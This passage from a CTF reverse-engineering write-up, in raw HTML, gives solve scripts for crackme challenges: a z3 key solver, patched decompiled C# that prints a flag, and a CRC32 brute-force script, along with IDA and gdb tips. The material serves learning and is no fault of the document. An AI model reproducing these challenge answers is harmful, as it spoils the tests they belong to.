class="k">def</span> <span class="nf">getNum</span><span class="p">():</span> <span class="n">b</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">num2</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># 2 ** 30 &lt;= num &lt; 2 ** 31</span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span> <span class="n">num</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s1">&#39;num&#39;</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">num</span> <span class="o">&gt;=</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">31</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">num</span> <span class="o">&lt;</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">32</span><span class="p">)</span> <span class="c1"># s.add(num &gt; 1510650850)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">32</span><span class="p">):</span> <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">5</span><span class="p">:</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;FLAG{&#39;</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span> <span class="k">elif</span> <span class="mi">5</span> <span class="o">&lt;=</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">31</span><span class="p">:</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span> <span class="n">Or</span><span class="p">(</span> <span class="n">And</span><span class="p">(</span> <span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">65</span><span class="p">,</span> <span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">90</span><span class="p">,</span> <span class="p">),</span> <span class="c1"># ((array[num2] ^ (num &amp; 0x7f) ^ b) &amp; 0x7f) == ord(&#39;{&#39;),</span> <span class="c1"># ((array[num2] ^ (num &amp; 0x7f) ^ b) &amp; 0x7f) == ord(&#39;}&#39;),</span> <span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39; &#39;</span><span class="p">)</span> <span class="p">)</span> <span class="p">)</span> <span class="k">elif</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">31</span><span class="p">:</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;}&#39;</span><span class="p">))</span> <span class="n">b</span> <span class="o">^=</span> <span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="n">b</span> <span class="o">&amp;=</span> <span class="mh">0x7f</span> <span class="n">num2</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">num</span> <span class="o">&gt;&gt;=</span> <span class="mi">1</span> <span class="k">if</span> <span class="n">s</span><span class="o">.</span><span class="n">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span> <span class="k">print</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()</span> <span class="c1">#bug</span> <span class="c1"># print s.model()[num].as_long()</span> <span class="c1"># while s.check() == sat:</span> <span class="c1"># print s.model()[num]</span> <span class="c1"># s.add(Or(num != s.model()[num].as_long()))</span> </code></pre></td></tr></table> </div> </div><p>运行,num的值就秒出了</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fmyovxowozj30hw03975k.jpg" alt=""></p> <blockquote> <p>注释掉的部分是一个还没解决的bug,本来是想通过添加约束跑出所有的可行解,但可能是因为用了BitVec导致在数据类型的转换上有些问题,现在只跑出了一组解.等到考完试再来修这个bug</p> </blockquote> <p>有了num的值,接下类有很简单了,可用python求解</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s2">&#34;M4x&#34;</span> <span class="kn">import</span> <span class="nn">pdb</span> <span class="kn">from</span> <span class="nn">z3</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">array</span> <span class="o">=</span> <span class="p">[</span><span class="mi">164</span><span class="p">,</span><span class="mi">25</span><span class="p">,</span> <span class="mi">4</span><span class="p">,</span> <span class="mi">130</span><span class="p">,</span> <span class="mi">126</span><span class="p">,</span> <span class="mi">158</span><span class="p">,</span> <span class="mi">91</span><span class="p">,</span> <span class="mi">199</span><span class="p">,</span> <span class="mi">173</span><span class="p">,</span> <span class="mi">252</span><span class="p">,</span> <span class="mi">239</span><span class="p">,</span> <span class="mi">143</span><span class="p">,</span> <span class="mi">150</span><span class="p">,</span> <span class="mi">251</span><span class="p">,</span> <span class="mi">126</span><span class="p">,</span> <span class="mi">39</span><span class="p">,</span> <span class="mi">104</span><span class="p">,</span> <span class="mi">104</span><span class="p">,</span> <span class="mi">146</span><span class="p">,</span> <span class="mi">208</span><span class="p">,</span> <span class="mi">249</span><span class="p">,</span> <span class="mi">9</span><span class="p">,</span> <span class="mi">219</span><span class="p">,</span> <span class="mi">208</span><span class="p">,</span> <span class="mi">101</span><span class="p">,</span> <span class="mi">182</span><span class="p">,</span> <span class="mi">62</span><span class="p">,</span> <span class="mi">92</span><span class="p">,</span> <span class="mi">6</span><span class="p">,</span> <span class="mi">27</span><span class="p">,</span> <span class="mi">5</span><span class="p">,</span> <span class="mi">46</span><span class="p">]</span> <span class="c1"># print len(array)</span> <span class="k">def</span> <span class="nf">getNum</span><span class="p">():</span> <span class="n">b</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">num2</span> <span class="o">=</span> <span class="mi">0</span> <span class="c1"># 2 ** 30 &lt;= num &lt; 2 ** 31</span> <span class="n">s</span> <span class="o">=</span> <span class="n">Solver</span><span class="p">()</span> <span class="n">num</span> <span class="o">=</span> <span class="n">BitVec</span><span class="p">(</span><span class="s1">&#39;num&#39;</span><span class="p">,</span> <span class="mi">64</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">num</span> <span class="o">&gt;=</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">31</span><span class="p">)</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span><span class="n">num</span> <span class="o">&lt;</span> <span class="mi">2</span> <span class="o">**</span> <span class="mi">32</span><span class="p">)</span> <span class="c1"># s.add(num &gt; 1510650850)</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">xrange</span><span class="p">(</span><span class="mi">32</span><span class="p">):</span> <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">5</span><span class="p">:</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;FLAG{&#39;</span><span class="p">[</span><span class="n">i</span><span class="p">]))</span> <span class="k">elif</span> <span class="mi">5</span> <span class="o">&lt;=</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">31</span><span class="p">:</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(</span> <span class="n">Or</span><span class="p">(</span> <span class="n">And</span><span class="p">(</span> <span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">&gt;=</span> <span class="mi">65</span><span class="p">,</span> <span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">&lt;=</span> <span class="mi">90</span><span class="p">,</span> <span class="p">),</span> <span class="c1"># ((array[num2] ^ (num &amp; 0x7f) ^ b) &amp; 0x7f) == ord(&#39;{&#39;),</span> <span class="c1"># ((array[num2] ^ (num &amp; 0x7f) ^ b) &amp; 0x7f) == ord(&#39;}&#39;),</span> <span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39; &#39;</span><span class="p">)</span> <span class="p">)</span> <span class="p">)</span> <span class="k">elif</span> <span class="n">i</span> <span class="o">==</span> <span class="mi">31</span><span class="p">:</span> <span class="n">s</span><span class="o">.</span><span class="n">add</span><span class="p">(((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">==</span> <span class="nb">ord</span><span class="p">(</span><span class="s1">&#39;}&#39;</span><span class="p">))</span> <span class="n">b</span> <span class="o">^=</span> <span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="n">b</span> <span class="o">&amp;=</span> <span class="mh">0x7f</span> <span class="n">num2</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">num</span> <span class="o">&gt;&gt;=</span> <span class="mi">1</span> <span class="k">if</span> <span class="n">s</span><span class="o">.</span><span class="n">check</span><span class="p">()</span> <span class="o">==</span> <span class="n">sat</span><span class="p">:</span> <span class="k">print</span> <span class="n">s</span><span class="o">.</span><span class="n">model</span><span class="p">()</span> <span class="c1">#bug</span> <span class="c1"># print s.model()[num].as_long()</span> <span class="c1"># while s.check() == sat:</span> <span class="c1"># print s.model()[num]</span> <span class="c1"># s.add(Or(num != s.model()[num].as_long()))</span> <span class="k">def</span> <span class="nf">getFlag</span><span class="p">():</span> <span class="n">text2</span> <span class="o">=</span> <span class="s2">&#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ{} &#34;</span> <span class="n">num</span> <span class="o">=</span> <span class="mi">3658134498</span> <span class="n">num2</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">b</span> <span class="o">=</span> <span class="mi">0</span> <span class="n">flag</span> <span class="o">=</span> <span class="s2">&#34;&#34;</span> <span class="k">while</span> <span class="n">num</span><span class="p">:</span> <span class="n">c</span> <span class="o">=</span> <span class="nb">chr</span><span class="p">((</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="o">^</span> <span class="p">(</span><span class="n">num</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="o">^</span> <span class="n">b</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7f</span><span class="p">)</span> <span class="k">if</span> <span class="n">c</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">text2</span><span class="p">:</span> <span class="k">print</span> <span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="n">flag</span> <span class="o">+=</span> <span class="n">c</span> <span class="n">b</span> <span class="o">^=</span> <span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="n">num2</span> <span class="o">+=</span> <span class="mi">1</span> <span class="n">num</span> <span class="o">&gt;&gt;=</span> <span class="mi">1</span> <span class="k">print</span> <span class="n">flag</span> <span class="c1"># getNum()</span> <span class="n">getFlag</span><span class="p">()</span> </code></pre></td></tr></table> </div> </div><p>也可简单的修改反编译得到的c#代码,运行C#得到flag(推荐该方法)</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-C#" data-lang="C#"><span class="c1">// GrayCCC </span><span class="c1"></span><span class="k">using</span> <span class="nn">System</span><span class="p">;</span> <span class="k">namespace</span> <span class="nn">GrayCCC</span> <span class="p">{</span> <span class="k">class</span> <span class="nc">GCCC</span> <span class="p">{</span> <span class="k">public</span> <span class="k">static</span> <span class="k">void</span> <span class="n">Main</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Console.Write(&#34;Input the key: &#34;); </span><span class="c1"></span> <span class="c1">// uint num; </span><span class="c1"></span> <span class="c1">// if (!uint.TryParse(Console.ReadLine().Trim(), out num)) </span><span class="c1"></span> <span class="c1">// { </span><span class="c1"></span> <span class="c1">// Console.WriteLine(&#34;Invalid key&#34;); </span><span class="c1"></span> <span class="c1">// return; </span><span class="c1"></span> <span class="c1">// } </span><span class="c1"></span> <span class="kt">string</span> <span class="n">text</span> <span class="p">=</span> <span class="s">&#34;&#34;</span><span class="p">;</span> <span class="kt">string</span> <span class="n">text2</span> <span class="p">=</span> <span class="s">&#34;ABCDEFGHIJKLMNOPQRSTUVWXYZ{} &#34;</span><span class="p">;</span> <span class="kt">int</span> <span class="n">num2</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="kt">uint</span> <span class="n">num</span> <span class="p">=</span> <span class="m">3658134498</span><span class="p">;</span> <span class="kt">byte</span><span class="p">[]</span> <span class="n">array</span> <span class="p">=</span> <span class="k">new</span> <span class="kt">byte</span><span class="p">[]</span> <span class="p">{</span> <span class="m">164</span><span class="p">,</span><span class="m">25</span><span class="p">,</span> <span class="m">4</span><span class="p">,</span> <span class="m">130</span><span class="p">,</span> <span class="m">126</span><span class="p">,</span> <span class="m">158</span><span class="p">,</span> <span class="m">91</span><span class="p">,</span> <span class="m">199</span><span class="p">,</span> <span class="m">173</span><span class="p">,</span> <span class="m">252</span><span class="p">,</span> <span class="m">239</span><span class="p">,</span> <span class="m">143</span><span class="p">,</span> <span class="m">150</span><span class="p">,</span> <span class="m">251</span><span class="p">,</span> <span class="m">126</span><span class="p">,</span> <span class="m">39</span><span class="p">,</span> <span class="m">104</span><span class="p">,</span> <span class="m">104</span><span class="p">,</span> <span class="m">146</span><span class="p">,</span> <span class="m">208</span><span class="p">,</span> <span class="m">249</span><span class="p">,</span> <span class="m">9</span><span class="p">,</span> <span class="m">219</span><span class="p">,</span> <span class="m">208</span><span class="p">,</span> <span class="m">101</span><span class="p">,</span> <span class="m">182</span><span class="p">,</span> <span class="m">62</span><span class="p">,</span> <span class="m">92</span><span class="p">,</span> <span class="m">6</span><span class="p">,</span> <span class="m">27</span><span class="p">,</span> <span class="m">5</span><span class="p">,</span> <span class="m">46</span> <span class="p">};</span> <span class="kt">byte</span> <span class="n">b</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="k">while</span> <span class="p">(</span><span class="n">num</span> <span class="p">!=</span> <span class="m">0</span><span class="n">u</span><span class="p">)</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">c</span> <span class="p">=</span> <span class="p">(</span><span class="kt">char</span><span class="p">)(</span><span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">]</span> <span class="p">^</span> <span class="p">(</span><span class="kt">byte</span><span class="p">)</span><span class="n">num</span> <span class="p">^</span> <span class="n">b</span><span class="p">);</span> <span class="k">if</span> <span class="p">(!</span><span class="n">text2</span><span class="p">.</span><span class="n">Contains</span><span class="p">(</span><span class="k">new</span> <span class="kt">string</span><span class="p">(</span><span class="n">c</span><span class="p">,</span> <span class="m">1</span><span class="p">)))</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Invalid key&#34;</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="n">text</span> <span class="p">+=</span> <span class="n">c</span><span class="p">;</span> <span class="n">b</span> <span class="p">^=</span> <span class="n">array</span><span class="p">[</span><span class="n">num2</span><span class="p">++];</span> <span class="n">num</span> <span class="p">&gt;&gt;=</span> <span class="m">1</span><span class="p">;</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="n">text</span><span class="p">);</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="n">text</span><span class="p">.</span><span class="n">Substring</span><span class="p">(</span><span class="m">0</span><span class="p">,</span> <span class="m">5</span><span class="p">)</span> <span class="p">!=</span> <span class="s">&#34;FLAG{&#34;</span> <span class="p">||</span> <span class="n">text</span><span class="p">.</span><span class="n">Substring</span><span class="p">(</span><span class="m">31</span><span class="p">,</span> <span class="m">1</span><span class="p">)</span> <span class="p">!=</span> <span class="s">&#34;}&#34;</span><span class="p">)</span> <span class="p">{</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Invalid key&#34;</span><span class="p">);</span> <span class="k">return</span><span class="p">;</span> <span class="p">}</span> <span class="n">Console</span><span class="p">.</span><span class="n">WriteLine</span><span class="p">(</span><span class="s">&#34;Your flag is: &#34;</span> <span class="p">+</span> <span class="n">text</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> </code></pre></td></tr></table> </div> </div><blockquote> <p>可以看出,通过z3求解此类多约束问题能极大地提高效率.</p> <p>另外听Kira师傅说这道题也可以逐位爆破,也等到考完试再来填坑吧.</p> </blockquote> <h3 id="0x06-ccc">0x06 ccc</h3> <p>IDA F5后程序的流程很清楚，唯一一处有困惑的是不知道下图中的crc32函数是按照什么规则加密的并且返回值是什么</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq5cakdunj30cz05nglg.jpg" alt=""></p> <p>根据for循环中的i = 3， i += 3等信息可以推测v3是每3位计算一次，但究竟是a2[0: 3], a2[3: 6]这种方式还是a2[0: 3], a2[0: 6]这种方式还不得而知，静态分析crc32函数有很麻烦。这时，就可以用gdb动态调试来验证加密的方式。</p> <p>首先在伪代码页右键，Copy to Assembly，方便我们在汇编页快速定位，如下定位到关键地址0x8048558</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq5gshmm9j30ft03fweb.jpg" alt=""></p> <p>直接在gdb中下断点，r运行到断点，输入42位字符，此时程序运行到了断点处</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq5kxzof8j30kz0akwm5.jpg" alt=""></p> <p>n，执行下一步，此时crc32的返回值即保存在了eax寄存器中（函数调用约定）</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq5ngyv3ej30z40bbqfi.jpg" alt=""></p> <p>可以发现，第一次调用crc32函数时，函数对输入的前3位做了计算，接下来调用的计算方式可以类比动态调试得到，最终发现crc32是按照a[0: 3], a[0: 6], a[0: 9]这样的方式进行计算的，每次循环计算的结果再与hashes中的只比较即可</p> <blockquote> <p>再补充一个trick，这个操作是跟w1tcher表哥学到的</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq5sp5eotj30nc07hgll.jpg" alt=""></p> <p>我们知道crc32计算的结果是8位16进制数，而IDA默认以两位16进制数显示数据，这是我们可以在第一个数据上右键，data，使前四个转成8位16进制数形式（或者快捷键D），然后再右键，array，点击OK，即可默认把下边的数据按第一组的形式展现出来</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq5wgc59rj30qe03qwee.jpg" alt=""></p> </blockquote> <p>每次爆破3位即可，脚本如下：</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span></code></pre></td> <td class="lntd"> <pre class="chroma"><code class="language-python" data-lang="python"><span class="ch">#!/usr/bin/env python</span> <span class="c1"># -*- coding: utf-8 -*-</span> <span class="n">__Auther__</span> <span class="o">=</span> <span class="s1">&#39;M4x&#39;</span> <span class="kn">import</span> <span class="nn">binascii</span> <span class="kn">import</span> <span class="nn">string</span> <span class="kn">import</span> <span class="nn">pdb</span> <span class="n">hashes</span> <span class="o">=</span> <span class="p">[</span><span class="mh">0x0D641596F</span><span class="p">,</span> <span class="mh">0x80A3E990</span><span class="p">,</span> <span class="mh">0x0C98D5C9B</span><span class="p">,</span> <span class="mh">0x0D05AFAF</span><span class="p">,</span> <span class="mh">0x1372A12D</span><span class="p">,</span> <span class="mh">0x5D5F117B</span><span class="p">,</span> <span class="mh">0x4001FBFD</span><span class="p">,</span> <span class="mh">0x0A7D2D56B</span><span class="p">,</span> <span class="mh">0x7D04FB7E</span><span class="p">,</span> <span class="mh">0x2E42895E</span><span class="p">,</span> <span class="mh">0x61C97EB3</span><span class="p">,</span> <span class="mh">0x84AB43C3</span><span class="p">,</span> <span class="mh">0x9FC129DD</span><span class="p">,</span> <span class="mh">0x0F4592F4D</span><span class="p">]</span> <span class="k">def</span> <span class="nf">crc</span><span class="p">(</span><span class="n">s</span><span class="p">,</span> <span class="n">cnt</span><span class="p">):</span> <span class="k">for</span> <span class="n">a</span> <span class="ow">in</span> <span class="n">dic</span><span class="p">:</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="n">dic</span><span class="p">:</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">dic</span><span class="p">:</span> <span class="n">ans</span> <span class="o">=</span> <span class="n">s</span> <span class="o">+</span> <span class="n">a</span> <span class="o">+</span> <span class="n">b</span> <span class="o">+</span> <span class="n">c</span> <span class="c1"># print tmp</span> <span class="k">if</span> <span class="p">(</span><span class="n">binascii</span><span class="o">.</span><span class="n">crc32</span><span class="p">(</span><span class="n">ans</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0xffffffff</span><span class="p">)</span> <span class="o">==</span> <span class="n">hashes</span><span class="p">[</span><span class="n">cnt</span><span class="p">]:</span> <span class="c1"># pdb.set_trace()</span> <span class="k">return</span> <span class="n">ans</span> <span class="c1"># dic = string.ascii_letters + string.digits + &#34; _-{},&#34;</span> <span class="n">dic</span> <span class="o">=</span> <span class="n">string</span><span class="o">.</span><span class="n">printable</span> <span class="c1"># ans = &#39;FLAG{&#39;</span> <span class="n">ans</span> <span class="o">=</span> <span class="s1">&#39;&#39;</span> <span class="n">cnt</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">while</span> <span class="bp">True</span><span class="p">:</span> <span class="k">try</span><span class="p">:</span> <span class="n">ans</span> <span class="o">=</span> <span class="n">crc</span><span class="p">(</span><span class="n">ans</span><span class="p">,</span> <span class="n">cnt</span><span class="p">)</span> <span class="n">cnt</span> <span class="o">+=</span> <span class="mi">1</span> <span class="k">print</span> <span class="n">ans</span> <span class="k">except</span><span class="p">:</span> <span class="k">break</span> </code></pre></td></tr></table> </div> </div><h3 id="0x07-bitx">0x07 bitx</h3> <p>IDA中可以看到，输入是与0x804A040地址上的一组数据进行比较的（IDA伪代码页，右键，Hide casts可以隐藏数据类型，看起来美观不少），程序逻辑很简单，直接放脚本</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq65j3cptj30rc06mt8p.jpg" alt=""></p> <p>提取数据可以直接粘贴复制，也可以直接用idc或者ida python等脚本，如下的idc脚本即可dump出内存中的数据</p> <p><img src="https://ws1.sinaimg.cn/large/006AWYXBly1fkq6m3zyhkj30i00e2jrf.jpg" alt=""></p> <p>解题脚本如下</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 